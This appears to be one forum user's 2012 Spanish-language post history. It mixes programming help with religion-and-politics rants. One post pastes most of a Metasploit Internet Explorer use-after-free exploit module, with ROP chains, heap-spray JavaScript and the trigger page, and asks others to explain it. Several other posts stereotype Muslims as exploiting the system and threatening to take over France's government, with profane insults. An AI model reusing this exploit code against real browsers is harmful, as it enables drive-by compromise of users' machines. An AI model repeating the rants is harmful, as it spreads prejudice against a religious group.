|
73
|
Programación / Programación General / Re: Que hicieron para volverse programadores C++?
|
en: 20 Septiembre 2012, 08:29 am
|
Hola, hasta la 4 vineta esta bastatne bien explicado lo que tienes que aprender.
Bueno y eso de 2 semanas,para aprender otro lenguaje, discrepo.
Despues de conocer bien un lenguaje de programacion es facil aprender otro , te miras las diferencias y listo.Pero para saber otro lenguaje hay que: Practicar y crear muchos progrmas con ese nuevo lenguaje.Y hacer los programs en relativamente poco tiempo.
Saludos
|
|
|
74
|
Programación / Programación General / Re: ayuda programación
|
en: 19 Septiembre 2012, 16:44 pm
|
Hola Belisner.
Los dos son muy parecidos. Tanto C#.NET como vb.net usan el framework .NET. EL framework es la libreria que se encnarga de crear conexiones entre el software de desarollo y la aplicacion final.Usando el lenguaje CLI . (Comon language interface).
CLI es el lenguaje que usa .net en todos los lenguajes de progrmacion de la plataforma .NET
Porque te cuento todo esto porque SI hay un lenguaje comun para toda la plataforma net que significa?
Pues que podemos traducir facilmente codigos fuentes estandar para usarlos en otro lenguaje.
Te aconsejo c# .
|
|
|
75
|
Foros Generales / Foro Libre / Re: La pelicula de * que dio la vuelta al mundo.
|
en: 19 Septiembre 2012, 14:13 pm
|
Estoy deacuerdo, si seguimos dandole importancia a estas tonterias dentro de poco formaremos parte de ellos. Porque? Porque nuestro sistema protege excesivamente a las minorias.
Por lo que si un musulman se caga en Dios, no pasa nada porque el es una minoria en el Pais. Ahora si yo me cago en mahoma , van a saltar todas las asociaciones islamicas del mundo. Lo peor es que muchas de esas asociaciones estan en los paises ricos donde , al minorista se le protege enseguida.Porque?
Somos Idiotas , ellos lo saben y seguiran aprochandose del sistema.
Tu comentario un poco bestia si , efectivo si!Correcto No
Si seguimos asi y no es broma dentro de poco, los musulmanes en francia podrian votar por poner el velo a las mujeres.(Ejemplo un poco basto) Ya tenemos musulmanes en el senado en Francia. si hay (50%de musulmanes en senado significa control islamico sobre el gobierno.)
Todavia no estamos en ese punto pero me asusta solo de pensarlo.
Quien da mas miedo China o los islamistas? Que sera lo siguiente?? Que pasa si la comunidad islamica sigue creciendo?
Bueno saludos a todos.
|
|
|
76
|
Programación / Programación C/C++ / Exlpoit Zero Day.
|
en: 19 Septiembre 2012, 13:39 pm
|
Hola a todos . Como ya sabran muchos hya un exploit por hay suelto que microsoft teme. Me puse a investigar un poco. Encontre el exploit y me puse a leerlo. Necesito ayuda para entender el codigo. http://dev.metasploit.com/redmine/projects/framework/repository/revisions/cc8102434af31669cdd54fe10e438181498983e5/entry/modules/exploits/windows/browser/ie_execcommand_uaf.rbAlgun programador que pueda resumirme rapidamente las partes para que sirven? Resumirme en 3 bloques O 4 MAS O MENOS PARA SABER LO QUE HACE. No entinedo a partir de aqui. def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
exec_size = code.length
stack_pivot = [
0x77c4e393, # RETN
0x77c4e392, # POP EAX # RETN
0x77c15ed5, # XCHG EAX, ESP # RETN
].pack("V*")
rop =
[
0x77C21891, # POP ESI # RETN
0x0c0c0c04, # ESI
0x77c4e392, # POP EAX # RETN
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
exec_size, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
0x77c46101, # ROP NOP (-> edi)
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre
print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1
if t['Random']
stack_pivot = [
0x0c0c0c0c, # 0c0c0c08
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05 # XCHG EAX, ESP # RET
].pack("V*")
else
stack_pivot = [
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05 # XCHG EAX, ESP # RET
].pack("V*")
end
rop =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
exec_size, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c351e05, # NEG EAX # RETN
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
].pack("V*")
end
code = stack_pivot + rop + code
return code
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_code, js_nops)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset_length = #{t['Offset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def get_spray(t, js_code, js_nops)
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
JS
end
def load_html1(cli, my_target)
p = get_payload(my_target, cli)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if my_target['Random']
js = get_random_spray(my_target, js_code, js_r_nops)
else
js = get_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
html = <<-EOS
<html>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
</script>
<iframe src="#{this_resource}/#{@html2_name}"></iframe>
<script>
#{js}
</script>
</body>
</html>
EOS
return html
end
def load_html2
html = %Q|
<HTML>
<script>
function funcB() {
document.execCommand("selectAll");
};
function funcA() {
document.write("#{Rex::Text.rand_text_alpha(1)}");
parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
}
</script>
<body onload='funcB();' onselect='funcA()'>
<div contenteditable='true'>
a
</div>
</body>
</HTML>
|
return html
end
def this_resource
r = get_resource
return ( r == '/') ? '' : r
end
def on_request_uri(cli, request)
print_status request.headers['User-Agent']
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, sending a 404: #{agent.to_s}")
send_not_found(cli)
return
end
vprint_status("Requesting: #{request.uri}")
if request.uri =~ /#{@html2_name}/
print_status("Loading #{@html2_name}")
html = load_html2
elsif request.uri =~ /#{@html1_name}/
print_status("Loading #{@html1_name}")
html = load_html1(cli, my_target)
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
print_status("Redirecting to #{@html1_name}")
send_redirect(cli, "#{this_resource}/#{@html1_name}")
return
else
send_not_found(cli)
return
end
html = html.gsub(/^\t\t/, '')
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
super
end
end
Igual he pedido demasiado pero cualquier ayuda es bien recibida Saludos
|
|
|
77
|
Foros Generales / Foro Libre / Re: La pelicula de * que dio la vuelta al mundo.
|
en: 19 Septiembre 2012, 11:23 am
|
Umm.No estoy del todo deacuerdo.Que odian a estados unidos? Quien no odia a estados unidos? Soy frances y si tu supieras la de musulmanes que hay en francia,pues estan los medios que hechan humo. Pues a todos los musulmanes que piensan que la fuerza es la solucion. Que os den por el OJAL. Estoy harto de la escoria humana que busca cualquier escusa para ,hacer uso de la fuerza. Ojala alguno me lea. Saludos para los que no se quejan y estan ahi aguantando.
|
|
|
78
|
Foros Generales / Foro Libre / La pelicula de * que dio la vuelta al mundo.
|
en: 19 Septiembre 2012, 10:31 am
|
Alguien me podria explicar porque una pelicula , que hace referencia a un dios ridiculizandolo,como puede probocar esta oleada de ataques mediaticos revindicando blasfemias contra su religion; cuando todos los dias veo peliculas que se mofan de Jesus y de cualquier cosa. Quien dice nada? Estoy en mi derecho de ridiculizar a un dios en una pelicula si asi me lo parece ; porque la ley de expresion me lo permite. Os acordais de la vida de Bryan? Bueno y que ? cuantos murieron por hacer esa pelicula?
Que demonios pasa para que le den tanta importancia los musulmanes, de que tienen miedo? Que va a cambiar? Mira que soy creyente pero me La SUDA que ridiculizen a dios.Si no te gusta no lo veas. Como el porno.Si t egusta lo ves si no no!
|
|
|
79
|
Programación / .NET (C#, VB.NET, ASP) / Re: [VB.NET] Creación de bucles y comando if
|
en: 19 Septiembre 2012, 09:45 am
|
Respondiendo a:Puntoinfinito. timer1.interval = 10000
¿Quien dijo la limitación de tiempo? YO dije! limitas por defecto la consulta a 1 milisegundo .Repito : "Consulta" En tu caso 10000 son 10 segundos. Si eso es lo que quieres,pues bien. Pero normalmente cuando alguien hace un programa, hay que tener en cuenta , la velocidad de tus consultas. No te aconsejo utilizar Timers, a menos que sea estrictamente necesario. Saludos
|
|
|
|
|
|
|